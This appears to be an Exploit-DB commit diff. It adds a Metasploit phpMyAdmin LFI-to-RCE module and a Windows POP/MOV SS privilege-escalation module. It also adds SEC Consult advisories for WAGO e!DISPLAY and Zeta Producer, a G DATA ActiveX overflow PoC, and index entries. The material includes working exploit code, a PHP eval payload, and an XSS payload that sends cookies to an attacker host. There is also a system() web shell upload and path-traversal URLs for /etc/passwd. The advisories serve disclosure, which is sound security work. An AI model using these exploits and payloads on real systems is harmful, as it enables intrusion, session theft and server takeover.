# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'phpMyAdmin Authenticated Remote Code Execution',
'Description' => %q{
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion,
which can be exploited post-authentication to execute PHP code by
application. The module has been tested with phpMyAdmin v4.8.1.
},
'Author' =>
[
'ChaMd5', # Vulnerability discovery and PoC
'Henry Huang', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '104532' ],
[ 'CVE', '2018-12613' ],
[ 'CWE', '661' ],
[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ],
[ 'URL', 'https://www.secpulse.com/archives/72817.html' ],
[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ]
],
'Privileged' => false,
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows', {} ],
[ 'Linux', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 19 2018'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
])
end
def check
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
rescue
vprint_error("#{peer} - Unable to connect to server")
return Exploit::CheckCode::Unknown
end
if res.nil? || res.code != 200
vprint_error("#{peer} - Unable to query /js/messages.php")
return Exploit::CheckCode::Unknown
end
# v4.8.0 || 4.8.1 phpMyAdmin
if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/
version = Gem::Version.new($1)
vprint_status("#{peer} - phpMyAdmin version: #{version}")
if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1')
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Unknown
end
def query(uri, qstring, cookies, token)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'import.php'),
'cookie' => cookies,
'vars_post' => Hash[{
'sql_query' => qstring,
'db' => '',
'table' => '',
'token' => token
}.to_a.shuffle]
})
end
def lfi(uri, data_path, cookies, token)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'encode_params' => false,
'vars_get' => {
'target' => "db_sql.php%253f#{'/..'*16}#{data_path}"
}
})
end
def exploit
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
uri = target_uri.path
vprint_status("#{peer} - Grabbing CSRF token...")
response = send_request_cgi({'uri' => uri})
if response.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
elsif response.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)
if target.name =~ /Automatic/
/\((?<srv>Win.*)?\)/ =~ response.headers['Server']
mytarget = srv.nil? ? 'Linux' : 'Windows'
else
mytarget = target.name
end
vprint_status("#{peer} - Identified #{mytarget} target")
#Pull out the last two cookies
cookies = response.get_cookies
cookies = cookies.split[-2..-1].join(' ')
vprint_status("#{peer} - Retrieved token #{token}")
vprint_status("#{peer} - Retrieved cookies #{cookies}")
vprint_status("#{peer} - Authenticating...")
login = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_post' => {
'token' => token,
'pma_username' => datastore['USERNAME'],
'pma_password' => datastore['PASSWORD']
}
})
if login.nil? || login.code != 302
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
end
#Ignore the first cookie
cookies = login.get_cookies
cookies = cookies.split[1..-1].join(' ')
vprint_status("#{peer} - Retrieved cookies #{cookies}")
login_check = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})
if login_check.nil?
fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
elsif login_check.body.include? 'Welcome to'
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
elsif login_check.body !~ /token"\s*value="(.*?)"/
fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
end
token = Rex::Text.html_decode($1)
vprint_status("#{peer} - Authentication successful")
#Generating strings/payload
database = rand_text_alpha_lower(5)
table = rand_text_alpha_lower(5)
column = rand_text_alpha_lower(5)
col_val = "'<?php eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\")); ?>'"
#Preparing sql queries
dbsql = "CREATE DATABASE #{database};"
tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});"
dropsql = "DROP DATABASE #{database};"
dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";'
#Create database
res = query(uri, dbsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database")
end
#Create table and column
res = query(uri, tablesql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table")
end
#Find datadir
res = query(uri, dirsql, cookies, token)
if res.nil? || res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end
unless res.body =~ /^<td data.*?>(.*)?</
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
end
#Creating include path
if mytarget == 'Windows'
#Table file location
data_path = $1.gsub(/\\/, '/')
data_path = data_path.sub(/^.*?\//, '/')
data_path << "#{database}/#{table}.frm"
else
#Session path location
/phpMyAdmin=(?<session_name>.*?);/ =~ cookies
data_path = "/var/lib/php/sessions/sess_#{session_name}"
end
res = lfi(uri, data_path, cookies, token)
#Drop database
res = query(uri, dropsql, cookies, token)
if res.nil? || res.code != 200
print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.")
end
end
end

View file

@ -0,0 +1,325 @@
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
=======================================================================
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
Source: http://www.wago.us/wago/
"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.
HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGOs e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."
Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp
Business recommendation:
------------------------
HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.
As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.
One possible solution may be e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations
SEC Consult recommends to immediately apply the available patches from the vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross site scripting vulnerabilities were identified within multiple PHP
scripts in the admin interface. The parameter JSON input which is sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.
This vulnerability is present for authenticated and unauthenticated users!
2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them to visit a malicious web site or clicking on an
malicious link.
This vulnerability is only present for authenticated users!
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as privileged user, it is not possible to upload a
file directly to the web root but on many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.
4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the same user which is used in the
context of the web server.
5) Remote code execution via multiple attack vectors
By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside
attacker can place a malicious script on the device in order to execute arbitrary
commands as 'www'. This can be done by uploading a web shell or a reverse
shell.
Proof of concept:
-----------------
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
The affected endpoints are:
http://<IP-Address>/wbm/configtools.php
http://<IP-Address>/wbm/login.php
http://<IP-Address>/wbm/receive_upload.php
The following request is an example for reflected XSS within 'configtools.php':
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
Content-type: text/plain
[...]
{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml}<img
src=x onerror=this.src='http://$attacker:8001/?c='+document.cookie>;"}}}
-------------------------------------------------------------------------------
Steal the cookie via XSS and send it to http://$attacker:8001?c=<Session-ID>:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP-Address>/wbm/configtools.php" method="POST"
enctype="text/plain">
<input type="hidden"
name="&#123;"sessionId"&#58;""&#44;"aDeviceParams"&#58;&#123;"0"&#58;&#123;"name"&#58;"firewall"&#44;"parameter"&#58;&#91;"iptables"&#44;"&#45;&#45;get&#45;xml"&#93;&#44;"sudo"&#58;true&#44;"multiline"&#58;true&#44;"timeout"&#58;10000&#125;&#44;"1"&#58;&#123;"name"&#58;"firewall"&#44;"parameter"&#58;&#91;"firewall"&#44;"&#45;&#45;is&#45;enabled"&#93;&#44;"sudo"&#58;true&#44;"multiline"&#58;true&#44;"timeout"&#58;10000&#44;"dataId"&#58;"&#123;DoNotParseAsXml&#125;<img&#32;src"
value="x&#32;onerror&#61;this&#46;src&#61;&apos;http&#58;&#47;&#47;&#46;&#46;&#46;&#58;8001&#47;&#63;c&#61;&apos;&#43;document&#46;cookie>&#59;"&#125;&#125;&#125;"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
2) Stored Cross-Site Scripting (CVE-2018-12981)
To exploit this vulnerability malicious code has to be placed in the "PLC List"
by surfing to the endpoint http://<IP-Address>/app/index.html and clicking on
the tab "Application->PLC-List". By opening one of the configurable PLCs the
name can be changed in the box "Text:" in order to execute arbitrary script-
code. For example:
<img src=a onerror=alert('SEC_Consult_XSS');alert(document.cookie)>
The payload can also be placed on the device by using the following POST request:
-------------------------------------------------------------------------------
POST /wbm/configtools.php HTTP/1.1
Host: <IP-Address>
[...]
{"sessionId":"<Valid session-ID>
","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=<img
src=a
onerror=alert('SEC_Consult_XSS');alert(document.cookie)>","vkb=enabled","mon=1"],"sudo":true}}}
-------------------------------------------------------------------------------
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
The file path, the file name and the file content can be manipulated in any
way. There is no server-side check for malicious files.
-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"
true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"
font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"
<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"
/tmp/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="any_file.sh"
Content-Type: application/x-font-ttf
any-content #!
-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------
4) Incorrect Default Permissions (CVE-2018-12979)
The file 'index.html' is owned by 'www' and can therefore also be overwritten
with a web shell.
www@WAGO_eDisplay:/var/www ls -la
drwxr-xr-x 5 root root 488 XXX 99 2018 .
drwxr-xr-x 11 root root 824 XXX 99 2018 ..
lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM
-rw-r--r-- 1 www www 345 XXX 99 2018 index.html
drwxr-xr-x 7 root root 776 XXX 99 2018 plclist
drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM
drwxr-xr-x 2 root root 688 XXX 99 2018 wbm
5) Remote code execution via multiple attack vectors
By uploading a simple PHP shell and overwriting the 'index.html' file located
under the web root an attacker can place a web shell which is reachable without
any authentication.
-------------------------------------------------------------------------------
POST /wbm/receive_upload.php HTTP/1.1
Host: <IP-Address>
[...]
Content-Type: multipart/form-data;
boundary=---------------------------728140389204955163192597293
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="touchWbm"
true
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_type"
font
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="session_id"
<Valid session-ID>
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="upload_directory"
/var/www/
-----------------------------728140389204955163192597293
Content-Disposition: form-data; name="font_file"; filename="index.html"
Content-Type: application/x-font-ttf
<html><body>
<form method="GET" name="SEC Consult PoC" action="">
<input type="text" name="command"><input type="submit" value="Send"></form>
<pre><?php if($_GET['command']){system($_GET['command']);} ?></pre>
</body></html>
-----------------------------728140389204955163192597293--
-------------------------------------------------------------------------------
The shell can now be reached via "http://<IP-Address>/index.html". It is also
possible to upload a reverse-shell to the system which connects to a computer
outside of the actual network.
Vulnerable / tested versions:
-----------------------------
The following device with the firmware version has been tested:
* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01)
According to WAGO the following e!DISPLAY versions are vulnerable:
762-3000 FW 01
762-3001 FW 01
762-3002 FW 01
762-3003 FW 01
Vendor contact timeline:
------------------------
2018-04-30: Sending encrypted advisory to VDE CERT for coordination support
(info@cert.vde.com)
2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted
2018-05-08: Status update from VDE CERT
2018-05-23: Asking for status update, no news from WAGO (via VDE CERT)
2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in
testing phase
2018-06-12: WAGO requested more time, postponing release date, asking for
affected & fixed versions
2018-06-13: VDE CERT will request CVE numbers
2018-06-17: WAGO scheduled the release for 2018-07-11
2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions
2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers
2018-07-10: VDE CERT publishes security notice:
https://cert.vde.com/de-de/advisories/vde-2018-010
2018-07-11: SEC Consult advisory release
Solution:
---------
Update the device to the latest available firmware (FW 02). For further
information see the vendor's security notifications page:
https://www.wago.com/de/automatisierungstechnik/security (German)
Direct link to English WAGO advisory:
https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU
Workaround:
-----------
Restrict network access to the device, don't allow Internet access from the
HMI station and do not install software from untrusted sources.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

View file

@ -0,0 +1,152 @@
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
=======================================================================
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html
Business recommendation:
------------------------
The vendor provides a patched version which should be installed immediately.
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.
However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.
Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.
Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.
The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php
2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal issues.
The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php
Proof of concept:
-----------------
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list
Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest version available
at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/
Vendor contact timeline:
------------------------
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: Contacting vendor again, extending email address list, no reply
2018-01-09: Contacting vendor again
2018-01-10: Vendor replies, requests transmission of security advisory
2018-01-10: Sending unencrypted security advisory
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
the reported vulnerabilities.
2018-07-12: Public advisory release.
Solution:
---------
Upgrade to version 14.2.1 or newer. See the vendor's download page:
https://www.zeta-producer.com/de/download.html
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Workaround:
-----------
Remove "formmailer" and "filebrowser" widgets.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

View file

@ -0,0 +1,73 @@
<!--
=====[ Tempest Security Intelligence - ADV-24/2018 ]===
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow
Author: Filipe Xavier Oliveira
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]=====================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Overview]==============================================================
* System affected : G DATA TOTAL SECURITY [1].
* Software Version : 25.4.0.3 (other versions may also be affected).
* Impact : A user may be affected by opening a malicious black list
email in the antispam filter,
=====[ Detailed description]==================================================
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.
Through a long input in a member of class called Antispam, isblackedlist
class is vulnerable a buffer overflow.
A poc that causes a buffer overflow :
-->
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"
memberName = "IsBlackListed"
progid = "GDASPAMLib.AntiSpam"
argCount = 1
arg1=String(14356, "A")
target.IsBlackListed arg1
</script></job></package>
<!--
=====[ Timeline of disclosure]===============================================
04/10/2018 - Vulnerability reported.
04/17/2018 - The vendor will fix the vulnerability.
05/24/2017 - Vulnerability fixed.
07/12/2018 - CVE assigned [1]
=====[ Thanks & Acknowledgements]============================================
- Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References]===========================================================
[1] https://www.gdatasoftware.com/
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018
[3] http://www.tempest.com.br
=====[ EOF]====================================================================
-->

174
exploits/windows/local/45024.rb Executable file
View file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',
'Description' => %q{
This module exploits a vulnerability in a statement in the system programming guide
of the Intel 64 and IA-32 architectures software developer's manual being mishandled
in various operating system kerneles, resulting in unexpected behavior for #DB
excpetions that are deferred by MOV SS or POP SS.
This module will upload the pre-compiled exploit and use it to execute the final
payload in order to gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nick Peterson', # Original discovery (@nickeverdox)
'Nemanja Mulasmajic', # Original discovery (@0xNemi)
'Can Bölük <can1357>', # PoC
'bwatters-r7' # msf module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 08 2018',
'References' =>
[
['CVE', '2018-8897'],
['EDB', '44697'],
['BID', '104071'],
['URL', 'https://github.com/can1357/CVE-2018-8897/'],
['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'False'
}
))
register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXECUTE_DELAY',
[false, 'The number of seconds to delay before executing the exploit', 3])
])
end
def setup
super
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
@exploit_path = "#{temp_path}\\#{exploit_name}"
@payload_exe = generate_payload_exe
end
def validate_active_host
begin
host = session.session_host
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end
def validate_remote_path(path)
unless directory?(path)
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
end
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end
end
end
def ensure_clean_exploit_destination
ensure_clean_destination(exploit_path)
end
def ensure_clean_payload_destination
ensure_clean_destination(payload_path)
end
def upload_exploit
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
upload_file(exploit_path, local_exploit_path)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
end
def upload_payload
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end
def execute_exploit
sleep(datastore['EXECUTE_DELAY'])
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
vprint_status(output)
end
def exploit
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_exploit_destination
ensure_clean_payload_destination
upload_exploit
upload_payload
execute_exploit
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
ensure_clean_exploit_destination
ensure_clean_payload_destination
end
end
attr_reader :exploit_name
attr_reader :payload_name
attr_reader :payload_exe
attr_reader :temp_path
attr_reader :payload_path
attr_reader :exploit_path
end

View file

@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
